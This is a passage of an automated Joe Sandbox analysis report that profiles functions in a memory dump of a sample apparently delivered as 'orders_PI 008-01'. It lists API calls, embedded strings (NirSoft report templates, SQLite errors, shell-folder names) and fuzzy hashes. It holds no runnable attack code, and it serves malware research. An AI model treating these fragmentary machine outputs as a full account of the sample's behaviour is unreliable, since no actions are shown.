                                        Function 0040D957 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 97windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadMenuW.USER32(?,?), ref: 0040D97F
                                          • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                          • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                          • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                          • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                        • DestroyMenu.USER32(00000000), ref: 0040D99D
                                        • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                        • GetDesktopWindow.USER32 ref: 0040D9FD
                                        • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                        • memset.MSVCRT ref: 0040DA23
                                        • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                        • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                        • DestroyWindow.USER32(00000005), ref: 0040DA70
                                          • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                        • String ID: caption
                                        • API String ID: 973020956-4135340389
                                        • Opcode ID: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                        • Instruction ID: d77e6bedd7727d4aace6f5c0bd160524984489d6dc7b24eaa8e7ecc9459ec1fc
                                        • Opcode Fuzzy Hash: e527282329e758372625c7aced3bf19f10c29faef3bcce853f9f760d7f68934a
                                        • Instruction Fuzzy Hash: 60319072900208BFEF11AF91DC85EAA3B78FF04315F10843AF909A61A1D7799D58CF59
                                        Function 00410A60 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 90COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                        • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                        • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                        • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$_snwprintf$wcscpy
                                        • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                        • API String ID: 1283228442-2366825230
                                        • Opcode ID: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                        • Instruction ID: da896b014e5ee892582fb8e7d48e4383de9842bc572d8210300f5843ce7472f7
                                        • Opcode Fuzzy Hash: aad372153645cc2b66520eb5eda5f4843b54733af1e5b0f3fbeb8aacc0aad8fb
                                        • Instruction Fuzzy Hash: 5C2182B69002197BDB21AB95CC41EDE77BCAF08785F0040ABF549D3151DA789F888BA9
                                        Function 00413959 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 82COMMON
                                        Download Yara Rule
                                        APIs
                                        • wcschr.MSVCRT ref: 00413972
                                        • wcscpy.MSVCRT ref: 00413982
                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                          • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                          • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                        • wcscpy.MSVCRT ref: 004139D1
                                        • wcscat.MSVCRT ref: 004139DC
                                        • memset.MSVCRT ref: 004139B8
                                          • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                          • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                        • memset.MSVCRT ref: 00413A00
                                        • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                        • wcscat.MSVCRT ref: 00413A27
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                        • String ID: \systemroot
                                        • API String ID: 4173585201-1821301763
                                        • Opcode ID: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                        • Instruction ID: a9582ad2fab6187976d7b5f1d827ce349b207672d34ede1993470c6c3fb504e1
                                        • Opcode Fuzzy Hash: 98bce9d9e9325d6f39714f6b424e1477d6b518cde7e6df5d8c0f4db39efede23
                                        • Instruction Fuzzy Hash: 7D21F6F68053146AE720FB619C86EEF73EC9F06719F20415FF115A20C6EA7C9A844B5E
                                        Function 00414BB0 Relevance: 16.6, APIs: 1, Strings: 10, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscpy
                                        • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                        • API String ID: 1284135714-318151290
                                        • Opcode ID: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                        • Instruction ID: e2253d4fd864bfabc2f945990654e2d0feb0e3e4f5de9ed447e77a37a808a444
                                        • Opcode Fuzzy Hash: 0a607774d7c303284e27c7b04db276e27a23f0d6d0cd9d042bad1c6033713506
                                        • Instruction Fuzzy Hash: 04F0127526EA4161142406240E0DEF75509D0D575F3F74A537A02E89D6FCCDDEC6609F
                                        Function 0040D2AB Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                        • String ID: 0$6
                                        • API String ID: 4066108131-3849865405
                                        • Opcode ID: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                        • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                        • Opcode Fuzzy Hash: fc96a420e8f8bdf87928e34e657a0b6c1b8723afb93dcca2deed5b8d5a3436dd
                                        • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                        Function 004082C7 Relevance: 15.2, APIs: 10, Instructions: 229COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 004082EF
                                          • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                        • memset.MSVCRT ref: 00408362
                                        • memset.MSVCRT ref: 00408377
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$ByteCharMultiWide
                                        • String ID:
                                        • API String ID: 290601579-0
                                        • Opcode ID: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                        • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                        • Opcode Fuzzy Hash: aa14e1b9e389497361ed401ed70ebc10d5f62d7ff5e107018b9223dc9ab6e0fb
                                        • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                        Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                        Download Yara Rule
                                        APIs
                                        • memchr.MSVCRT ref: 00444EBF
                                        • memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                        • memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                        • memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                        • memcpy.MSVCRT(?,0044EB0C,0000000B), ref: 00444FAF
                                        • memcpy.MSVCRT(?,00000001,00000008), ref: 00444FC1
                                        • memcpy.MSVCRT(PD,?,00000008,?,?), ref: 00445010
                                        • memset.MSVCRT ref: 0044505E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpy$memchrmemset
                                        • String ID: PD$PD
                                        • API String ID: 1581201632-2312785699
                                        • Opcode ID: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                        • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                        • Opcode Fuzzy Hash: 0e910d3a8e1f8c818d40de505798e2cb595e2298e7188f8e397b04e98a163445
                                        • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                        Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                        • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                        • GetDC.USER32(00000000), ref: 00409F6E
                                        • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                        • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                        • GetWindowRect.USER32(?,?), ref: 00409FA0
                                        • GetParent.USER32(?), ref: 00409FA5
                                        • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                        • String ID:
                                        • API String ID: 2163313125-0
                                        • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                        • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                        • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                        • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                        Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: free$wcslen
                                        • String ID:
                                        • API String ID: 3592753638-3916222277
                                        • Opcode ID: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                        • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                        • Opcode Fuzzy Hash: ee4a635328ec67d54f876bdb2dea934223b4b651374da98f2fba9a82a9ef0b7d
                                        • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                        Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                        Download Yara Rule
                                        APIs
                                        • memset.MSVCRT ref: 0040A47B
                                        • _snwprintf.MSVCRT ref: 0040A4AE
                                        • wcslen.MSVCRT ref: 0040A4BA
                                        • memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                        • wcslen.MSVCRT ref: 0040A4E0
                                        • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpywcslen$_snwprintfmemset
                                        • String ID: %s (%s)$YV@
                                        • API String ID: 3979103747-598926743
                                        • Opcode ID: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                        • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                        • Opcode Fuzzy Hash: 1cd29c0c96bb3ddeb02ffde04bffb630c2350d0f86c95190f97a15d0a128dfe3
                                        • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                        Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                        • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                        • FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                        • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: Library$AddressFreeLoadMessageProc
                                        • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                        • API String ID: 2780580303-317687271
                                        • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                        • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                        • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                        • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                        Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000,?,00412758,00000000), ref: 0040A686
                                        • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669), ref: 0040A6A4
                                        • wcslen.MSVCRT ref: 0040A6B1
                                        • wcscpy.MSVCRT ref: 0040A6C1
                                        • LocalFree.KERNEL32(00000000,?,00000400,00000000,00000000,00000000,?,00000000,?,?,00409764,?,00000000,?,00410669,00000000), ref: 0040A6CB
                                        • wcscpy.MSVCRT ref: 0040A6DB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                        • String ID: Unknown Error$netmsg.dll
                                        • API String ID: 2767993716-572158859
                                        • Opcode ID: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                        • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                        • Opcode Fuzzy Hash: 5982e7e4988f8d3682e164896efd2193f6d57f3c4e1bf6f54fb8b809858ad133
                                        • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                        Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        • wcscpy.MSVCRT ref: 0040DAFB
                                        • wcscpy.MSVCRT ref: 0040DB0B
                                        • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                          • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: PrivateProfilewcscpy$AttributesFileString
                                        • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                        • API String ID: 3176057301-2039793938
                                        • Opcode ID: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                        • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                        • Opcode Fuzzy Hash: 19b23b35163b1b9442cb05249b6519e0ec66bb1c0419b9cd6882ee6235bf6311
                                        • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                        Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • too many attached databases - max %d, xrefs: 0042F64D
                                        • database %s is already in use, xrefs: 0042F6C5
                                        • unable to open database: %s, xrefs: 0042F84E
                                        • cannot ATTACH database within transaction, xrefs: 0042F663
                                        • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                        • database is already attached, xrefs: 0042F721
                                        • out of memory, xrefs: 0042F865
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memcpymemset
                                        • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                        • API String ID: 1297977491-2001300268
                                        • Opcode ID: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                        • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                        • Opcode Fuzzy Hash: b87818fa112a0acc8a66a9ae252063e0b2e26e7fac12933c278b7e571d5e68ae
                                        • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                        Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                          • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB3F
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040EB5B
                                        • memcpy.MSVCRT(?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB80
                                        • memcpy.MSVCRT(?,0045A234,00000014,?,0045A248,00000014,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?), ref: 0040EB94
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC17
                                        • ??2@YAPAXI@Z.MSVCRT(0000000C,00000000,?,004126A8,00000000), ref: 0040EC21
                                        • ??2@YAPAXI@Z.MSVCRT(00000000,?,004126A8,00000000), ref: 0040EC59
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                          • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                          • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                          • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                          • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                          • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.1771786076.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000005.00000002.1771786076.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000005.00000002.1771786076.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                        • String ID: ($d
                                        • API String ID: 1140211610-1915259565
                                        • Opcode ID: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                        • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                        • Opcode Fuzzy Hash: a1c7ed4194c507a0631b10337623f35aa4fe9b12b4df3912366feb9681346245
                                        • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
